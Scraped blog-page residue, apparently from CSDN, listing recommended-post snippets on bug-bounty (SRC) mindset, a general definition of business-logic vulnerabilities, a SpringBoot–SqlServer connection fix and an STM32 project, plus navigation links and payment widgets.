SRC漏洞挖掘之道(非常详细),零基础入门精通,看这一篇

SRC 需要有一个好心态,国内 SRC 生态并不是很好,SRC 感觉更多的提供了一个相对安全的测试保障,所以更需要抱着一种学习的心态去挖,将我们学习的到的知识灵活运用,发现新的问题。不要想我今晚一定要挖到多少漏洞,要拿到多少奖金,不然可能会被忽略三连打崩心态。

wly55690的博客 2608

逻辑漏洞总结

逻辑漏洞:又称业务逻辑漏洞,是指由于程序逻辑不严谨或者 逻辑太复杂,导致一些逻辑分支不能正常处理或 者处理错误。通俗的讲,一个系统功能太多后,程序开发人员难以顾及到方方面面,对于某些地方的处理可能有遗漏, 从而导致逻辑漏洞逻辑漏洞的出现:通常出现在任意密码修改(没有旧密码验证)、越权访问、密码找回、交易支付金额等。普遍存在性: 由于功能的实现需要大量的逻辑操作,同时受制于程序员的背景,这类缺陷普遍存在于各类应用程序中。 不固定型: 或者称作“十分有针对性”,因为每一种逻辑缺陷似乎都是唯一的,它是基于逻辑

qq_45244158的博客 9740

SpringBoot如何正确连接SqlServer(亲测可用)

对于SpringBoot连接SqlServer的方式常见的错误的汇总。1、驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接。2、com.microsoft.sqlserver.jdbc.SQLServerException: 对象名 ‘DUAL‘ 无效。

黄团团的个人博客 2万+

STM32F401调试PID工程(串口按VOFA+软件的数据格式发送)

STM32F401调试PID工程(串口按VOFA+软件的数据格式发送)

上一篇: 护网行动基本介绍(非常详细)零基础入门到精通,收藏这一篇就够了
下一篇: 如何在2024年成为一名程序员?分步指南
网络安全大白
博客等级 码龄4年 7289粉丝 703原创
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值